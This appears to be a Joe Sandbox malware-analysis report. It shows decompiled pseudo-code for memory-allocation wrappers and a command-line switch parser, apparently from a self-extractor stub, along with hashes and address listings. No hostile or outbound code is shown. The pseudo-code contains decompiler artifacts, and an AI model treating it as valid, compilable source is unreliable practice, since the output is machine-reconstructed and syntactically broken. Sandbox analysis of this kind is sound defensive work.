                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                        • Opcode ID: 834417ffd6525188688ea2ae6dda068b8c3ef242674accaecba9e5d26fad080e
                                                                                                                                                                                                        • Instruction ID: bfeabb89283b6c297189877ecd2c07c7550803149c0ab08b11cf6e63ad53e414
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 834417ffd6525188688ea2ae6dda068b8c3ef242674accaecba9e5d26fad080e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61B09276726440426E2447756C295562981AAD123A7E41B92F132C01E0CE3EC856D044
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A94CA0 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A94CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                        0x00a94caa
                                                                                                                                                                                                        0x00a94cb1

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 00A94CAA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3761449716-0
                                                                                                                                                                                                        • Opcode ID: b8a24ac996e79dcd53a972b50cbc5519acf05a227e24810147512d053866c831
                                                                                                                                                                                                        • Instruction ID: d253eca198073c457fb0d2a258c916e7be4b53d557c0d4da7e4801c865e70d32
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8a24ac996e79dcd53a972b50cbc5519acf05a227e24810147512d053866c831
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11B0123214420CB7CF001FC6EC09F853F1DE7C4761F140002F60C494508E73942186D6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A94CC0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A94CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}




                                                                                                                                                                                                        0x00a94cc8
                                                                                                                                                                                                        0x00a94ccf

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2979337801-0
                                                                                                                                                                                                        • Opcode ID: f6cd5e18bcaf910a2e124c54629a74946686fb9f18db4a15ef79c46045144a35
                                                                                                                                                                                                        • Instruction ID: eafdc185d21a0f7425aa8a149d23bc41e0a53b1bc036dcd617b17517e00c319e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f6cd5e18bcaf910a2e124c54629a74946686fb9f18db4a15ef79c46045144a35
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69B0123100010CB78F001B86EC088453F1DD6C02607000012F50C454218F33981285C5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                        Function 00A95C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422COMMONCrypto
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E00A95C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0xa98004; // 0x6298f871
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00A96CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00A96E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0xa98004; // 0x6298f871
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E00A9597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E00A944B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0xa99124 = E00A96285();
									_t75 = 0;
								}
								return E00A96CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E00A944B9(0, 0x521, 0xa91140, 0, 0x40, 0);
												_t85 =  *0xa98588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E00A9667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E00A9667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00A95C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00A91680(0xa98c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E00A9667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E00A9667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0xa98a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00A95C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0xa98b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0xa98a3a;
																}
																E00A91680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E00A9658A(_t218, 0x104, 0xa91140);
																if(E00A931E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0xa98a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0xa98a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0xa98a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0xa98a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0xa98a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0xa99a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0xa99a2c =  *0xa99a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0xa98d48 =  *0xa98d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0xa99a2c =  *0xa99a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0xa99a2c =  *0xa99a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0xa98d48 =  *0xa98d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0xa99a2c =  *0xa99a2c | 0x00000004;
																										L70:
																										 *0xa98a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0xa99a2c = 3;
																	 *0xa98a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0xa98a2c != 0 &&  *0xa98b3e == 0) {
						if(GetModuleFileNameA( *0xa99a3c, 0xa98b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E00A966C8(0xa98b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}


































































                                                                                                                                                                                                        0x00a95c9e
                                                                                                                                                                                                        0x00a95ca9
                                                                                                                                                                                                        0x00a95cb0
                                                                                                                                                                                                        0x00a95cb3
                                                                                                                                                                                                        0x00a95cb6
                                                                                                                                                                                                        0x00a95cb7
                                                                                                                                                                                                        0x00a95cb8
                                                                                                                                                                                                        0x00a95cbd
                                                                                                                                                                                                        0x00a96204
                                                                                                                                                                                                        0x00a95ccb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95ccb
                                                                                                                                                                                                        0x00a95cd3
                                                                                                                                                                                                        0x00a95cd7
                                                                                                                                                                                                        0x00a95cf4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95cf4
                                                                                                                                                                                                        0x00a95cf8
                                                                                                                                                                                                        0x00a95d00
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95d06
                                                                                                                                                                                                        0x00a95d06
                                                                                                                                                                                                        0x00a95d0e
                                                                                                                                                                                                        0x00a95d10
                                                                                                                                                                                                        0x00a95d12
                                                                                                                                                                                                        0x00a95d14
                                                                                                                                                                                                        0x00a95d15
                                                                                                                                                                                                        0x00a95d17
                                                                                                                                                                                                        0x00a95d49
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95d19
                                                                                                                                                                                                        0x00a95d19
                                                                                                                                                                                                        0x00a95d1d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95d3f
                                                                                                                                                                                                        0x00a95d3f
                                                                                                                                                                                                        0x00a95d4b
                                                                                                                                                                                                        0x00a95d4b
                                                                                                                                                                                                        0x00a95d4f
                                                                                                                                                                                                        0x00a95d8d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95d93
                                                                                                                                                                                                        0x00a95d93
                                                                                                                                                                                                        0x00a95d9a
                                                                                                                                                                                                        0x00a95d9d
                                                                                                                                                                                                        0x00a95d9e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95d9e
                                                                                                                                                                                                        0x00a95d51
                                                                                                                                                                                                        0x00a95d5b
                                                                                                                                                                                                        0x00a95d72
                                                                                                                                                                                                        0x00a960fb
                                                                                                                                                                                                        0x00a960fb
                                                                                                                                                                                                        0x00a96207
                                                                                                                                                                                                        0x00a9620a
                                                                                                                                                                                                        0x00a9620b
                                                                                                                                                                                                        0x00a9620e
                                                                                                                                                                                                        0x00a96217
                                                                                                                                                                                                        0x00a95d78
                                                                                                                                                                                                        0x00a95d78
                                                                                                                                                                                                        0x00a95d80
                                                                                                                                                                                                        0x00a95d83
                                                                                                                                                                                                        0x00a95d84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95d84
                                                                                                                                                                                                        0x00a95d5d
                                                                                                                                                                                                        0x00a95d5f
                                                                                                                                                                                                        0x00a95d62
                                                                                                                                                                                                        0x00a95d68
                                                                                                                                                                                                        0x00a95d64
                                                                                                                                                                                                        0x00a95d64
                                                                                                                                                                                                        0x00a95d64
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95d62
                                                                                                                                                                                                        0x00a95d5b
                                                                                                                                                                                                        0x00a95d4f
                                                                                                                                                                                                        0x00a95d1d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95d9f
                                                                                                                                                                                                        0x00a95d9f
                                                                                                                                                                                                        0x00a95da5
                                                                                                                                                                                                        0x00a95dab
                                                                                                                                                                                                        0x00a95dba
                                                                                                                                                                                                        0x00a96218
                                                                                                                                                                                                        0x00a9621d
                                                                                                                                                                                                        0x00a96220
                                                                                                                                                                                                        0x00a96221
                                                                                                                                                                                                        0x00a96229
                                                                                                                                                                                                        0x00a96230
                                                                                                                                                                                                        0x00a96247
                                                                                                                                                                                                        0x00a9626a
                                                                                                                                                                                                        0x00a96272
                                                                                                                                                                                                        0x00a96249
                                                                                                                                                                                                        0x00a96255
                                                                                                                                                                                                        0x00a9625f
                                                                                                                                                                                                        0x00a96264
                                                                                                                                                                                                        0x00a96264
                                                                                                                                                                                                        0x00a96284
                                                                                                                                                                                                        0x00a95dc0
                                                                                                                                                                                                        0x00a95dc0
                                                                                                                                                                                                        0x00a95dca
                                                                                                                                                                                                        0x00a95e22
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95dcc
                                                                                                                                                                                                        0x00a95dce
                                                                                                                                                                                                        0x00a95e24
                                                                                                                                                                                                        0x00a95e24
                                                                                                                                                                                                        0x00a95e2c
                                                                                                                                                                                                        0x00a95e47
                                                                                                                                                                                                        0x00a95e4a
                                                                                                                                                                                                        0x00a961d2
                                                                                                                                                                                                        0x00a961e2
                                                                                                                                                                                                        0x00a961e7
                                                                                                                                                                                                        0x00a961ee
                                                                                                                                                                                                        0x00a961f1
                                                                                                                                                                                                        0x00a961f1
                                                                                                                                                                                                        0x00a961f8
                                                                                                                                                                                                        0x00a961f8
                                                                                                                                                                                                        0x00a95e50
                                                                                                                                                                                                        0x00a95e53
                                                                                                                                                                                                        0x00a96109
                                                                                                                                                                                                        0x00a9611f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96125
                                                                                                                                                                                                        0x00a96137
                                                                                                                                                                                                        0x00a9613a
                                                                                                                                                                                                        0x00a9613c
                                                                                                                                                                                                        0x00a9613e
                                                                                                                                                                                                        0x00a9613e
                                                                                                                                                                                                        0x00a96141
                                                                                                                                                                                                        0x00a96141
                                                                                                                                                                                                        0x00a96143
                                                                                                                                                                                                        0x00a96144
                                                                                                                                                                                                        0x00a9614a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96150
                                                                                                                                                                                                        0x00a96152
                                                                                                                                                                                                        0x00a9615c
                                                                                                                                                                                                        0x00a96170
                                                                                                                                                                                                        0x00a96172
                                                                                                                                                                                                        0x00a9617c
                                                                                                                                                                                                        0x00a96190
                                                                                                                                                                                                        0x00a96190
                                                                                                                                                                                                        0x00a96196
                                                                                                                                                                                                        0x00a961a5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a961ab
                                                                                                                                                                                                        0x00a961b9
                                                                                                                                                                                                        0x00a961c6
                                                                                                                                                                                                        0x00a961c6
                                                                                                                                                                                                        0x00a9617e
                                                                                                                                                                                                        0x00a96180
                                                                                                                                                                                                        0x00a9618a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9618a
                                                                                                                                                                                                        0x00a9615e
                                                                                                                                                                                                        0x00a96160
                                                                                                                                                                                                        0x00a9616a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9616a
                                                                                                                                                                                                        0x00a9615c
                                                                                                                                                                                                        0x00a9614a
                                                                                                                                                                                                        0x00a9610b
                                                                                                                                                                                                        0x00a9610e
                                                                                                                                                                                                        0x00a9610e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95e59
                                                                                                                                                                                                        0x00a95e59
                                                                                                                                                                                                        0x00a95e5c
                                                                                                                                                                                                        0x00a9604f
                                                                                                                                                                                                        0x00a96056
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9605c
                                                                                                                                                                                                        0x00a9606e
                                                                                                                                                                                                        0x00a96071
                                                                                                                                                                                                        0x00a96073
                                                                                                                                                                                                        0x00a96075
                                                                                                                                                                                                        0x00a96075
                                                                                                                                                                                                        0x00a96078
                                                                                                                                                                                                        0x00a96078
                                                                                                                                                                                                        0x00a9607a
                                                                                                                                                                                                        0x00a9607b
                                                                                                                                                                                                        0x00a96081
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96087
                                                                                                                                                                                                        0x00a96087
                                                                                                                                                                                                        0x00a9608d
                                                                                                                                                                                                        0x00a9609c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a960a2
                                                                                                                                                                                                        0x00a960aa
                                                                                                                                                                                                        0x00a960b2
                                                                                                                                                                                                        0x00a960b7
                                                                                                                                                                                                        0x00a960bd
                                                                                                                                                                                                        0x00a960bf
                                                                                                                                                                                                        0x00a960bf
                                                                                                                                                                                                        0x00a960d6
                                                                                                                                                                                                        0x00a960e0
                                                                                                                                                                                                        0x00a960e7
                                                                                                                                                                                                        0x00a960f5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a960f5
                                                                                                                                                                                                        0x00a9609c
                                                                                                                                                                                                        0x00a96081
                                                                                                                                                                                                        0x00a95e62
                                                                                                                                                                                                        0x00a95e62
                                                                                                                                                                                                        0x00a95e65
                                                                                                                                                                                                        0x00a95fd3
                                                                                                                                                                                                        0x00a95fe9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95fef
                                                                                                                                                                                                        0x00a95fef
                                                                                                                                                                                                        0x00a95ff7
                                                                                                                                                                                                        0x00a95ffd
                                                                                                                                                                                                        0x00a96003
                                                                                                                                                                                                        0x00a96006
                                                                                                                                                                                                        0x00a96011
                                                                                                                                                                                                        0x00a96014
                                                                                                                                                                                                        0x00a9603d
                                                                                                                                                                                                        0x00a96016
                                                                                                                                                                                                        0x00a96018
                                                                                                                                                                                                        0x00a96019
                                                                                                                                                                                                        0x00a9601b
                                                                                                                                                                                                        0x00a96033
                                                                                                                                                                                                        0x00a9601d
                                                                                                                                                                                                        0x00a96020
                                                                                                                                                                                                        0x00a96029
                                                                                                                                                                                                        0x00a96022
                                                                                                                                                                                                        0x00a96022
                                                                                                                                                                                                        0x00a96022
                                                                                                                                                                                                        0x00a96020
                                                                                                                                                                                                        0x00a9601b
                                                                                                                                                                                                        0x00a96042
                                                                                                                                                                                                        0x00a96044
                                                                                                                                                                                                        0x00a96046
                                                                                                                                                                                                        0x00a9604a
                                                                                                                                                                                                        0x00a95ff7
                                                                                                                                                                                                        0x00a95fd5
                                                                                                                                                                                                        0x00a95fd8
                                                                                                                                                                                                        0x00a95fd8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95e6b
                                                                                                                                                                                                        0x00a95e6b
                                                                                                                                                                                                        0x00a95e6e
                                                                                                                                                                                                        0x00a95f8b
                                                                                                                                                                                                        0x00a95f99
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95f9f
                                                                                                                                                                                                        0x00a95fa7
                                                                                                                                                                                                        0x00a95faf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95fb1
                                                                                                                                                                                                        0x00a95fb3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95fb5
                                                                                                                                                                                                        0x00a95fb7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95fb9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95fb9
                                                                                                                                                                                                        0x00a95fb7
                                                                                                                                                                                                        0x00a95fb3
                                                                                                                                                                                                        0x00a95faf
                                                                                                                                                                                                        0x00a95f8d
                                                                                                                                                                                                        0x00a95f8d
                                                                                                                                                                                                        0x00a95f8d
                                                                                                                                                                                                        0x00a95f8f
                                                                                                                                                                                                        0x00a95fc1
                                                                                                                                                                                                        0x00a95fc1
                                                                                                                                                                                                        0x00a95fc1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95e74
                                                                                                                                                                                                        0x00a95e74
                                                                                                                                                                                                        0x00a95e77
                                                                                                                                                                                                        0x00a95ea0
                                                                                                                                                                                                        0x00a95ebd
                                                                                                                                                                                                        0x00a95f79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95f7f
                                                                                                                                                                                                        0x00a95ec3
                                                                                                                                                                                                        0x00a95ec3
                                                                                                                                                                                                        0x00a95ecc
                                                                                                                                                                                                        0x00a95ed4
                                                                                                                                                                                                        0x00a95ed6
                                                                                                                                                                                                        0x00a95edc
                                                                                                                                                                                                        0x00a95edf
                                                                                                                                                                                                        0x00a95eea
                                                                                                                                                                                                        0x00a95eed
                                                                                                                                                                                                        0x00a95f3f
                                                                                                                                                                                                        0x00a95f40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95eef
                                                                                                                                                                                                        0x00a95eef
                                                                                                                                                                                                        0x00a95ef2
                                                                                                                                                                                                        0x00a95f34
                                                                                                                                                                                                        0x00a95ef4
                                                                                                                                                                                                        0x00a95ef4
                                                                                                                                                                                                        0x00a95ef7
                                                                                                                                                                                                        0x00a95f2b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95ef9
                                                                                                                                                                                                        0x00a95ef9
                                                                                                                                                                                                        0x00a95efc
                                                                                                                                                                                                        0x00a95f22
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95efe
                                                                                                                                                                                                        0x00a95eff
                                                                                                                                                                                                        0x00a95f02
                                                                                                                                                                                                        0x00a95f16
                                                                                                                                                                                                        0x00a95f04
                                                                                                                                                                                                        0x00a95f07
                                                                                                                                                                                                        0x00a95f0d
                                                                                                                                                                                                        0x00a95f46
                                                                                                                                                                                                        0x00a95f46
                                                                                                                                                                                                        0x00a95f09
                                                                                                                                                                                                        0x00a95f09
                                                                                                                                                                                                        0x00a95f09
                                                                                                                                                                                                        0x00a95f07
                                                                                                                                                                                                        0x00a95f02
